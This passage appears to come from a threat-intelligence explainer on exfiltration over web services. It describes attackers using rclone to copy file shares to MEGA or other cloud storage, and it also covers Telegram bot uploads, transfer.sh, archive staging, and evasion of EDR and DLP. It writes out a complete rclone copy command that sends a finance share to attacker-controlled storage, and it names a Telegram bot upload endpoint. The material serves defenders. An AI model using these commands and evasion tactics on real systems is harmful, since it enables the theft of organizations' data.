The core move is picking a destination your organization already trusts with outbound traffic. Rclone is the workhorse: it speaks the API of dozens of cloud backends (MEGA, pCloud, S3-compatible buckets, FTP) and a single command like rclone copy D:\Finance\ mega:backup --config rc.conf --ignore-existing moves an entire share to attacker-controlled cloud storage in one line. Because rclone is a legitimate open-source sync tool, EDR products often see it as a signed, known binary rather than malware, and the traffic itself is unremarkable HTTPS to a domain like storage.googleapis.com or mega.co.nz.
Beyond rclone, the same technique shows up as a browser upload to transfer.sh or a code-repository push (T1567.001), or as an HTTP POST to a Telegram bot endpoint (api.telegram.org/bot<token>/sendDocument), which lets an attacker exfiltrate through a channel the target already allows for chat or notification integrations. All of these variants share the same operational logic: reuse infrastructure the firewall permits, ride TLS so payload inspection is blind, and blend into background SaaS traffic instead of standing up dedicated C2.
Operators typically stage first. Files get collected into a target directory or compressed into an archive (T1560) to reduce transfer time and hide file extensions from content-aware DLP, then the exfil tool runs once against a small number of destination hosts. The rclone config file itself is a useful artifact: attackers drop it in a writable path like C:\Users\Public rather than rclone's normal config directory, because they installed the binary fresh rather than reusing an admin's existing setup.